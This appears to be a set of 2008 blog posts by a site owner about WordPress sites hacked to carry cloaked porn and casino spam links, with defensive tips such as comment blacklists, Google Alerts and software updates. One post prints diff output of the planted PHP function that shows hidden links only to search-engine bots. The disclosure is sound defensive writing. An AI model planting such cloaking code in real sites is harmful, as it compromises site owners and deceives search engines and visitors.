The spammer is sending out casino & poker comment spam that links to the hacked pages that are found in /wp-content/1/ — it looks like this:

To block this spam from wasting your time, just go into your WordPress comment settings and add wp-content/1/ to your comment blacklist. That should automatically mark all of those fake comments as spam:

Related posts:

1. WordPress, Google Groups, Porn Spam and Malware Distribution
2. Hackers Bypass Msplinks.com Redirects on MySpace With Dangerous Phishing Attack
3. Are Your WordPress Plugins Secretly Injecting Links in Your Blog?

The script would do the following:

1. log into your WordPress server over SSH
2. take a snapshot of your filesystem including filesizes and permissions
3. repeat with cron
4. if there are any discrepancies, email the diff to you – or, if it’s a desktop program, then show the status in your desktop widget
5. If it were a desktop program, it could have a list of new files to moderate. Once you checked that you approve the file changes, then the program would recognize those new files as being safe

Just brainstorming here. It could be a shell script, or a GUI program that sits in your taskbar, or even a widget/gadget…

There would be discrepancies every time you uploaded a new file, but better to get a notification about the change than to have your site hacked and penalized by Google.

If someone wants to program this, contact me because I have more ideas about it. Please make it GPL and cross platform

Related posts:

1. Getting More EDU Backlinks
2. How To Defend Against Porn Link Injection
3. WordPress Comment Spam Warning

I’ve seen this happen many times to EDU and other sites. “Hackers” break into the sites and put hidden links to networks of porn sites. I even saw one EDU site that had porn links all over the home page. Those links pointed at pages about porn on other hacked trusted sites, which then pointed to or redirected to porn affiliate links. Some of the pages would try to install malware.

Here is a way to protect this from happening to your site and your clients’ sites:

Google Alerts

Go to Google Alerts and you will see a form like the one below:

Fill in the form with the following data, replacing example.com with your domain name:

Search terms: site:example.com porn
Type: Comprehensive
How often: once a day
Your email: [your email address]

That tells Google to send you an email whenever they see the word porn on your site. You can also setup alerts for related spammy keywords like ringtones.

I’ve tested this since being penalized and it works. Google has sent me an email telling me that there is porn content on this site that I can’t see:

I recommend setting this up for all of your sites and your client sites.

Here are some examples of otherwise trusted sites that have fallen victim to this problem — warning: the following links to Google search results pages contain explicit porn keywords:

• MexicoCity.com.mx — Google says “This site may harm your computer.”
• Harvard.edu
• General hacked EDU sites

Keep Your Software Updated

This blog was hacked because I was running WordPress 2.1.3 until yesterday (now running the latest 2.3.3). There were some security holes in it. I didn’t upgrade, because WordPress releases new versions so fast that it’s difficult to keep up when you have a lot of sites. I didn’t think it would happen to me… but I’m going to keep updated with the latest versions of WordPress from now on.

I hope this post helps other people avoid getting penalized in Google because of injected porn links.

UPDATE: 23 Mar 08: Watch out for a new WordPress exploit for 2.3.3

Related posts:

1. The Final Cure for WordPress Link Injection
2. WordPress, Google Groups, Porn Spam and Malware Distribution
3. Pocket SEO Was Hacked :(

It turns out that my site was hacked and a backdoor was installed. Someone was inserting cloaked porn links in the footer.

Here is what happens when you search Google for site:pocketseo.com porn. Until today I had a noarchive meta tag so this is the only way to view it.

click here for a screenshot (explicit words blacked out)

The hacker uploaded some files that included a function called wpc7c16b8466d864eeefd20050625c7775() that added cloaked links to the site.

This is partial output of a diff run on the site – it comes from a new file called class-mail.php:

+
+add_action('wp_footer','wpc7c16b8466d864eeefd20050625c7775');
+function wpc7c16b8466d864eeefd20050625c7775() {
+	$seau=array("google","yahoo","slurp","msn","live","ask","altavista","aol");
+	$sebot=""; foreach($seau as $ua) if(strpos(strtolower($_SERVER['HTTP_USER_AGENT']),$ua)!==false){ $sebot="1"; break; }
+	if(!($sebot==1 && sizeof($_COOKIE)==0)) return;
+	@include('./wp-includes/class-mail.php');
+	if(sizeof($wparr)>0){
+		shuffle($wparr);
+		echo "<div id=\"_wp_footer\">";
+		foreach($wparr as $k=>$v){
+			echo "<a href=\"".$v['url']."\" title=\"".ucwords($v['key'])."\">".ucwords($v['key'])."</a>\n";
+			if($i++==$inum) break;
+		}
+		echo "</div>".$_footer;
+	}
+}
+

Other Victims

Here are a few other sites that mention the problem:

• docunext.com
• adrianspender.com
• howardowens.com

I’ve upgraded WordPress, and filed a reinclusion request with Google. Lesson learned: always stay updated with the latest version of WordPress…

UPDATE: 22 March 2008

Google’s “bad news” response to my reinclusion request:

March 20, 2008

We’ve received a request from a site owner to reconsider the following site for inclusion in our index: http://pocketseo.com/

We’ll review the site. If we find that it’s no longer in violation of our Webmaster Guidelines, we’ll reinclude the site in our index. Please allow several weeks for the reconsideration request. We do review all requests, but unfortunately we can’t reply individually to each request.

Related posts:

1. How Long Does It Take For a Google Reinclusion Request?
2. How to Add a Dynamic Copyright to Your Web Site Footer
3. WordPress Comment Spam Warning